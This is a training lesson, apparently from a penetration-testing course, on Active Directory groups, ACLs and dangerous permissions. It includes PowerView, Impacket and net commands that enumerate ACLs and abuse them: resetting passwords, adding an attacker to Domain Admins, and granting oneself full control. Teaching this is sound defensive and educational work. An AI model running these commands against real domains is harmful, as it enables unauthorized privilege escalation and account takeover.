AD Groups and Permissions

intermediate30 minWriteup

Understanding groups, ACLs, and permission structures

Learning Objectives

  • Understand AD groups
  • Learn about ACLs and DACLs
  • Identify privileged groups
  • Understand delegation

In Active Directory, groups and permissions are how access is controlled. Understanding them is crucial because misconfigured permissions are one of the most common attack vectors. One "tiny" permission on the wrong group can give an attacker domain admin.

Think of groups like keychains - they hold multiple keys (permissions). Give someone the keychain, they get all the keys. The question is: who has keychains they shouldn't have?

Group Types and Scopes

Group Types

  • Security Groups: Used to assign permissions (what we care about)
  • Distribution Groups: Email distribution only (not security-relevant)

Group Scopes

1Domain Local Groups:
2├── Can contain: Users/groups from any domain
3├── Used for: Permissions on resources in THIS domain only
4└── Example: DL_FileShare_Read
5 
6Global Groups:
7├── Can contain: Users/groups from SAME domain only
8├── Used for: Organizing users, assigning to domain local groups
9└── Example: G_HR_Staff
10 
11Universal Groups:
12├── Can contain: Users/groups from ANY domain in forest
13├── Used for: Enterprise-wide access
14└── Example: Enterprise Admins, Schema Admins
15 
16Best Practice (AGDLP):
17Account -> Global -> Domain Local -> Permission

Memory Aid: AGDLP

Accounts go in Global groups, Global goes in Domain Local groups, Domain Local gets Permissions. Most environments don't follow this, creating enumeration opportunities.

High-Value Groups

1Tier 0 - Domain Control:
2├── Domain Admins - Full domain control
3├── Enterprise Admins - Full forest control (exists in root domain only)
4├── Schema Admins - Modify AD schema
5├── Administrators - Local admin on DCs
6└── Domain Controllers - All DCs in domain
7 
8Tier 1 - Server Control:
9├── Server Operators - Manage DCs
10├── Backup Operators - Read any file, backup/restore
11├── Print Operators - Load drivers on DCs
12├── Account Operators - Create/modify users (except admins)
13└── DnsAdmins - Manage DNS (potential DA escalation!)
14 
15Tier 2 - Workstation Control:
16├── Remote Desktop Users - RDP access
17└── Remote Management Users - WinRM access
18 
19Often Overlooked:
20├── Group Policy Creator Owners - Create GPOs
21├── Certificate Service DCOM Access - ADCS attacks
22└── Pre-Windows 2000 Compatible Access - Legacy permissions

DnsAdmins = Domain Admin

DnsAdmins members can load arbitrary DLLs on domain controllers via the DNS service. This is a well-known privilege escalation to DA.

Access Control Lists (ACLs)

Every AD object has a Security Descriptor containing an ACL. ACLs define who can do what to the object.

ACL Components

1Security Descriptor:
2├── Owner - Who owns the object
3├── DACL (Discretionary ACL) - Who can access
4│   └── ACE (Access Control Entry)
5│       ├── Trustee (Who - user/group SID)
6│       ├── Access Mask (What - permissions)
7│       └── Type (Allow/Deny)
8└── SACL (System ACL) - Auditing settings

Dangerous Permissions

1GenericAll - Full control
2├── Can modify anything on the object
3├── Add users to groups, reset passwords, etc.
4└── Equivalent to being owner
5 
6GenericWrite - Modify attributes
7├── Change group membership
8├── Modify servicePrincipalName (Kerberoasting setup)
9└── Write to other dangerous attributes
10 
11WriteDACL - Modify permissions
12├── Grant yourself more permissions
13└── Chain to GenericAll
14 
15WriteOwner - Take ownership
16├── Become owner, then WriteDACL, then GenericAll
17└── Stealthy privilege escalation
18 
19ForceChangePassword - Reset password
20├── Take over user accounts
21└── No need to know current password
22 
23AddMember - Add to group
24├── Add yourself or others to groups
25└── Escalate via privileged group membership

Extended Rights

Some permissions are "Extended Rights" like DS-Replication-Get-Changes (DCSync). These are often overlooked in ACL reviews.

Enumerating Permissions

powershell
1606070;"># PowerView - Find interesting ACLs
2Import-Module PowerView.ps1
3 
4606070;"># Find ACLs where current user has rights
5Find-InterestingDomainAcl -ResolveGUIDs
6 
7606070;"># Check ACLs on specific object
8Get-DomainObjectAcl -Identity 606070;">#a5d6ff;">"Domain Admins" -ResolveGUIDs
9 
10606070;"># Find ACLs for specific principal
11Get-DomainObjectAcl -ResolveGUIDs | ? {$_.SecurityIdentifier -match 606070;">#a5d6ff;">"S-1-5-21-...-1107"}
12 
13606070;"># BloodHound query (Cypher)
14MATCH (n)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner]->(m)
15WHERE n.name <> m.name
16RETURN n,r,m
bash
1606070;"># Impacket - Get ACL info
2dacledit.py -target 606070;">#a5d6ff;">'CN=Domain Admins,CN=Users,DC=corp,DC=local' corp.local/user:pass
3 
4606070;"># ldapsearch for raw ACL data
5ldapsearch -x -H ldap:606070;">//dc.corp.local -D "user@corp.local" -w 'pass' \
6  -b 606070;">#a5d6ff;">"CN=Domain Admins,CN=Users,DC=corp,DC=local" nTSecurityDescriptor

ACL Abuse Examples

GenericAll on User

powershell
1606070;"># Reset user's password
2Set-DomainUserPassword -Identity target -AccountPassword (ConvertTo-SecureString 606070;">#a5d6ff;">'Password123!' -AsPlainText -Force)
3 
4606070;"># Or with net commands
5net user target NewPassword123! /domain

GenericAll on Group

powershell
1606070;"># Add yourself to the group
2Add-DomainGroupMember -Identity 606070;">#a5d6ff;">"Domain Admins" -Members attacker
3 
4606070;"># Or with net commands
5net group 606070;">#a5d6ff;">"Domain Admins" attacker /add /domain

WriteDACL Abuse

powershell
1606070;"># Grant yourself GenericAll
2Add-DomainObjectAcl -TargetIdentity 606070;">#a5d6ff;">"Domain Admins" -PrincipalIdentity attacker -Rights All
3 
4606070;"># Now you have GenericAll, can add to group

WriteOwner Abuse

powershell
1606070;"># Take ownership
2Set-DomainObjectOwner -Identity target -OwnerIdentity attacker
3 
4606070;"># As owner, grant WriteDACL, then GenericAll

Knowledge Check

Quick Quiz
Question 1 of 3

Which permission allows you to modify an object's ACL?

Challenges

Find the Path

Challenge
🔥 intermediate

Using BloodHound, find an attack path from your current user to Domain Admin that involves ACL abuse.

Need a hint? (4 available)

Key Takeaways

  • Security groups control access; distribution groups are for email only
  • Domain Admins, Enterprise Admins, Schema Admins are highest value
  • DnsAdmins, Backup Operators can escalate to Domain Admin
  • GenericAll, WriteDACL, WriteOwner are dangerous permissions
  • ACL misconfiguration is a common path to privilege escalation
  • BloodHound is essential for finding ACL-based attack paths